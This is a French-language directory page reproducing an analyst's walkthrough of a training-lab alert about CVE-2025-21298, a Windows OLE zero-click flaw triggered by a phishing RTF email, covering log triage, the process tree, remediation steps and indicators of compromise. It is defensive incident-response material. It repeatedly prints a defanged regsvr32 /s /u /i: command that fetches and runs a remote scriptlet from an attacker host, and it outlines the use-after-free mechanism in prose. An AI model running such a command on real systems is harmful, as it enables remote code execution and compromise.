Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298 — SOC336 - Exploitation RCE Zero-Click de Windows OLE détectée (CVE-2025-21298) - Procédure pas à pas | Kitploit
Outils/GitHubGitHub/abc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298
Analyse des VulnérabilitésExploitationMouvement LatéralRétro-ingénierieAnalyse ForensiqueHameçonnageAnalyse de MalwareCommandement et ContrôleRenseignement sur les Menaces
Apprentissage et Éducation
Réponse aux Incidents
Sécurité des Emails
GitHubabc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298

SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298

SOC336 - Exploitation RCE Zero-Click de Windows OLE détectée (CVE-2025-21298) - Procédure pas à pas

Voir le dépôtSite web
6il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

LinkedIn Gmail Instagram Old Discord Reddit


SOC336 - Détection d'une exploitation RCE zero-click OLE Windows (CVE-2025-21298) - Procédure pas à pas

phishing email

🔎 Table des matières
Situation
  • Aperçu de l'alerte
  • Outils utilisés
  • Analyse
    • Sécurité des e-mails
    • Gestion des journaux
      • Journal du proxy
    • Sécurité des endpoints
      • Historique du terminal
      • Action réseau
      • Processus
      • CVE-2025-21298
  • Playbook
  • Note de l'analyste
  • Référence
  • (Retour en haut)

    Situation

    L'un de nos employés, Austin, a reçu un e-mail de phishing provenant d'un expéditeur suspect, et une alerte a été déclenchée après qu'il a ouvert l'e-mail via Outlook le 4 février 2025 à 16h18. La raison du déclenchement était « Pièce jointe RTF malveillante identifiée avec un schéma d'exploitation connu pour CVE-2025-21298 » .

    (Retour en haut)

    Aperçu de l'alerte

    image

    EventID : 314

    Heure de l'événement : 4 février 2025 à 16h18 (je pense que c'était faux)

    Règle : SOC336 - Détection d'une exploitation RCE zero-click OLE Windows (CVE-2025-21298)

    Niveau : Analyste de sécurité

    Adresse SMTP : 84.38.130.118

    Adresse source : [email protected]

    Adresse de destination : [email protected]

    Objet de l'e-mail : Important : Action requise pour l'échéance du projet à venir

    Pièce jointe : mail.rtf

    Empreinte de la pièce jointe : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184

    Action de l'appareil : Autorisé

    Raison du déclenchement : Pièce jointe RTF malveillante identifiée avec un schéma d'exploitation connu pour CVE-2025-21298.

    (Retour en haut)

    Outils utilisés

    1. VirusTotal
    2. AbuseIPDB
    3. Gemini

    (Retour en haut)

    Analyse

    Examinons les journaux de sécurité des e-mails, de gestion des journaux et de sécurité des endpoints pour le triage de l'alerte.

    Sécurité des e-mails

    Screenshot 2026-05-27 151659

    J'ai recherché l'adresse de l'expéditeur projectmanagement@pm[.]me et cliqué sur l'e-mail « Important : Action requise pour l'échéance du projet à venir » envoyé à 05h12 le même jour, ce qui m'a paru étrange car les tons urgents et les formulations comme « Important » et « Action requise » m'ont donné un indice sur un e-mail de phishing.



    Screenshot 2026-05-27 175944

    J'ai recherché le domaine pm[.]me sur VirusTotal et un seul fournisseur l'a jugé suspect.



    Screenshot 2026-05-27 151915

    Cependant, lorsque j'ai recherché l'adresse SMTP 84[.]38[.]130[.]118, 7 fournisseurs l'ont signalée comme malveillante et contenant un malware, et elle était liée au serveur C2 SILVER.



    Screenshot 2026-05-27 180753
    Screenshot 2026-05-27 180810

    84[.]38[.]130[.]118 figurait également dans la base de données AbuseIPDB. Elle se situe à Riga, Riga, Lettonie, appartient au nom de domaine rixhost.lv et est catégorisée comme attaque DDoS, piratage et hôte exploité.



    Screenshot 2026-05-27 152243

    Enfin, j'ai recherché l'empreinte df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 de la pièce jointe mail.rtf sur VirusTotal et 29 fournisseurs sur 61 ont signalé la pièce jointe comme malveillante. Elle appartient à la famille de malwares rtfmalformb et a été associée à la vulnérabilité CVE-2025-21298.

    Il a été confirmé qu'un e-mail de phishing avec une pièce jointe malveillante a été envoyé à Austin.

    (Retour en haut)

    Gestion des journaux

    Vérifions s'il y a eu des activités suspectes après 05h12, lorsque Austin a ouvert l'e-mail de phishing.

    Journal du proxy

    Screenshot 2026-05-27 152515

    J'ai d'abord vérifié le journal du proxy et recherché l'adresse IP malveillante de l'expéditeur 84[.]38[.]130[.]118, découvrant qu'à 08h06 il y avait une requête HTTP GET vers l'adresse IP malveillante avec une URL hxxp://84[.]38[.]130[.]118/shell[.]sct initiée par cmd.exe, téléchargeant un fichier scriptlet Windows. Le code de réponse était 200 OK, indiquant que le trafic sortant était autorisé et non bloqué par le pare-feu. Il était inhabituel d'obtenir un fichier script contenant potentiellement un script de reverse shell.

    (Retour en haut)

    Sécurité des endpoints

    Historique du terminal

    image
    Screenshot 2026-05-27 153447

    Puisque le trafic sortant vers l'adresse IP malveillante a été initié par cmd.exe, j'ai d'abord vérifié l'historique du terminal et constaté qu'à 08h06:08 une commande « C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll » a été exécutée pour lancer regsvr32.exe afin de récupérer le fichier script depuis l'adresse IP malveillante via scrobj.dll.

    • regsvr32.exe : un utilitaire en ligne de commande pour enregistrer et désenregistrer les contrôles OLE, tels que les DLL et les contrôles ActiveX dans le registre Windows
    • /s : regsvr32.exe s'est exécuté en arrière-plan et silencieusement
    • /u : a forcé Windows à ne pas ajouter cette clé au registre Windows
    • /i : interface
    • scrobj.dll : bibliothèque d'exécution d'objets de script gérant les fichiers scriptlet

    L'utilisation des utilitaires intégrés de Windows pour récupérer le script peut laisser un minimum de traces sur le système, ce qui rend le processus de rétro-ingénierie et d'analyse de malware plus difficile !

    (Retour en haut)

    Action réseau

    Screenshot 2026-05-27 153102

    Il a été confirmé qu'une connexion vers l'IP malveillante 84[.]38[.]130[.]118 a eu lieu à 08h06:42, après l'événement d'exécution de la commande.

    (Retour en haut)

    Processus

    Alors pourquoi cmd.exe a-t-il été exécuté en cliquant simplement sur un e-mail ? Bien qu'aucune preuve de téléchargement de la pièce jointe malveillante mail.rtf par Austin n'ait été trouvée, j'ai vérifié les journaux des endpoints et recherché tout événement autour de 08h06.

    Screenshot 2026-05-27 153636

    ID du processus : 7023

    Heure de l'événement : 4 février 2025 08:06:25

    Ligne de commande : « regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll »

    Processus parent : cmd.exe



    Screenshot 2026-05-27 153616

    OK, alors regardons le processus parent cmd.exe

    ID du processus : 6784

    Heure de l'événement : 4 février 2025 08:06:08

    Ligne de commande : « regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll »

    Processus parent : outlook.exe



    Screenshot 2026-05-27 154136

    Et enfin, j'ai vérifié le processus parent de outlook.exe

    ID du processus : 4820

    Heure de l'événement : 4 février 2025 08:05:15

    Ligne de commande : « C:\Windows\System32\cmd.exe »

    Processus parent : explorer.exe



    Nous pouvons donc conclure l'arborescence des processus malveillants :

    explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ! Exécution du script !

    Cependant, je me demandais toujours comment les processus malveillants avaient été initiés sans télécharger et ouvrir la pièce jointe malveillante, et comment outlook.exe avait engendré le processus malveillant, jusqu'à ce que je trouve des informations sur CVE-2025-21298.

    (Retour en haut)

    CVE-2025-21298

    Screenshot 2026-05-27 201652

    Selon l'article d' Offsec, il y avait une vulnérabilité critique zero-click OLE Windows permettant une RCE via e-mail avec un score CVSS de 9,8 en janvier 2025. Lorsque le destinataire ciblé ouvre ou prévisualise simplement l'e-mail malveillant dans Microsoft Outlook contenant un document RTF nuisible avec un script intégré , la vulnérabilité est déclenchée, permettant à l'attaquant d'exécuter du code arbitraire sur le système affecté.

    J'ai fait des recherches sur Windows OLE et les processus de détournement des documents RTF sur Google et Gemini, en lien avec mes connaissances en rétro-ingénierie :

    1. Lors de l'ouverture ou de la prévisualisation du document RTF, la fonction UtOlePresStmToContentsStm dans ole32.dll pointe un objet OLE via pstmContents pour lire les données d'image miniature (OlePres) et les déverser dans le fichier de données réel (CONTENT).
    2. La fonction déclenche immédiatement une erreur de traitement inattendue en raison du format corrompu du fichier RTF de l'attaquant, provoquant la suppression de l'objet OLE mais pas du pointeur pstmContents.
    3. Le fichier RTF malveillant crée un objet OLE malveillant contenant le code malveillant d'une taille exactement identique à celle de l'objet OLE supprimé, remplissant le même espace mémoire toujours pointé par le pointeur pstmContents.
    4. Une fois la prévisualisation terminée par Outlook, il exécute le faux processus de « nettoyage » contenant le code malveillant « regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll » à l'intérieur du faux objet OLE malveillant.
    5. Le système de la victime exécute la charge utile distante et établit un reverse shell automatiquement, sans aucun clic.

    (Retour en haut)

    Playbook

    Screenshot 2026-05-28 144059
    Screenshot 2026-05-28 144109
    Screenshot 2026-05-28 144141
    Screenshot 2026-05-28 144154
    Screenshot 2026-05-28 144226
    Screenshot 2026-05-28 144240

    Non mis en quarantaine

    Screenshot 2026-05-28 144252

    Malveillant

    Screenshot 2026-05-28 144306

    Accédé

    Screenshot 2026-05-28 144316
    Screenshot 2026-05-28 144343
    Screenshot 2026-05-28 144730
    Screenshot 2026-05-28 144804
    Screenshot 2026-05-28 144844
    Screenshot 2026-05-28 144940
    Screenshot 2026-05-28 145001

    (Retour en haut)

    Note de l'analyste

    Classification : Critique

    Type : Malware

    Heure de l'activité :

    4 février 2025, 05h12 (E-mail de phishing reçu)

    4 février 2025, 08:05:15 - 4 février 2025, 08:06:42 (E-mail de phishing ouvert et code malveillant exécuté)

    Entités affectées :

    Adresse source : projectmanagement@pm[.]me

    Adresse SMTP : 84[.]38[.]130[.]118

    Adresse e-mail du destinataire : Austin@letsdefend[.]io

    Adresse IP du destinataire : 172[.]16[.]17[.]137

    Nom d'hôte : Austin

    Raisons du vrai positif :

    Le 4 février 2025 à 05h12, un e-mail suspect avec pour objet « Important : Action requise pour l'échéance du projet à venir » a été envoyé depuis [email protected] (adresse IP : 84.38.130.118) à [email protected] (adresse IP : 172.16.17.137) avec une pièce jointe mail.rtf (empreinte SHA256 : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184). Les tons et formulations d'urgence utilisés dans l'objet ont donné un indice sur un e-mail de phishing. Les services Threat Intel VirusTotal et AbuseIPDB ont signalé l'adresse IP de l'expéditeur, située à Riga, Riga, Lettonie, appartenant au nom de domaine rixhost.lv, ainsi que la pièce jointe comme malveillantes.

    Selon les journaux du proxy, à 08h06 il y avait une requête HTTP GET vers l'adresse IP malveillante avec une URL hxxp://84[.]38[.]130[.]118/shell[.]sct initiée par cmd.exe, téléchargeant un fichier scriptlet Windows. Le code de réponse était 200 OK, indiquant que le trafic sortant vers l'adresse IP malveillante était autorisé et non bloqué par le pare-feu.

    Selon les journaux de sécurité des endpoints, le code malveillant « regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll » (PID : 7023) a été initié par cmd.exe (PID : 6784), lui-même engendré par outlook.exe (PID : 4820)

    L'exploitation a été causée par une vulnérabilité critique zero-click OLE Windows (CVE-2025-21298) permettant une RCE via e-mail avec un score CVSS de 9,8 en janvier 2025. Lorsque le destinataire ciblé ouvre ou prévisualise simplement l'e-mail malveillant dans Microsoft Outlook contenant un document RTF nuisible avec un script intégré, la vulnérabilité est déclenchée, permettant à l'attaquant d'exécuter du code arbitraire sur le système affecté, établissant potentiellement un reverse shell vers le serveur C2.

    Raisons de l'escalade :

    Bien qu'aucun trafic réseau C2 actif post-exploitation n'ait encore été définitivement observé, les journaux de sécurité des endpoints ont confirmé l'exécution de regsvr32.exe utilisant scrobj.dll pour récupérer le fichier scriptlet shell.sct. En raison du score CVSS de 9,8 de CVE-2025-21298, une enquête plus approfondie est nécessaire pour vérifier toute activité suspecte sur l'hôte, comme la persistance ou l'exfiltration de données.

    Mesures correctives :

    • Déconnecter immédiatement l'hôte Austin du réseau interne de l'entreprise
    • Terminer le processus « regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll » et ses processus associés cmd.exe, outlook.exe
    • Bloquer le trafic sortant vers 84[.]38[.]130[.]118
    • Mettre sur liste noire le domaine rixhost[.]lv
    • Mettre sur liste noire l'expéditeur projectmanagement@pm[.]me sur le serveur de messagerie
    • Corriger la vulnérabilité CVE-2025-21298
    • Réinitialiser les identifiants d'Austin
    • Effectuer une analyse mémoire sur l'hôte Austin pour enquêter sur les activités malveillantes comme la connexion C2, la persistance, l'exfiltration de données après une exécution de shell.sct
    • Effectuer une rétro-ingénierie sur shell.sct
    • Effectuer une analyse des e-mails pour enquêter sur l'IP d'origine et l'adresse de retour dans l'en-tête de l'e-mail
    • Bloquer l'accès Internet initié par regsvr32.exe
    • Mener une campagne de sensibilisation au phishing pour éduquer les employés à ne pas ouvrir un e-mail provenant d'expéditeurs inconnus ou avec un ton ou des formulations urgentes

    Indicateurs de compromission :

    • Adresse de l'expéditeur : projectmanagement@pm[.]me
    • Adresse IP de l'expéditeur : 84[.]38[.]130[.]118 Domaine de l'expéditeur : rixhost[.]lv
    • E-mail de phishing : "Important: Action Required for Upcoming Project Deadline"
    • Document malveillant : mail.rtf (hash SHA256 : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184)
    • Arborescence de processus malveillante : outlook.exe (PID: 4820) -> cmd.exe (PID: 6784) -> regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023)
    • URL du second payload : hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll

    (Retour en haut)

    Référence

    Détails CVE-2025-21298

    CVE-2025-21298 : une vulnérabilité critique zero-click de Windows OLE

    (Retour en haut)

    Télécharger l’outil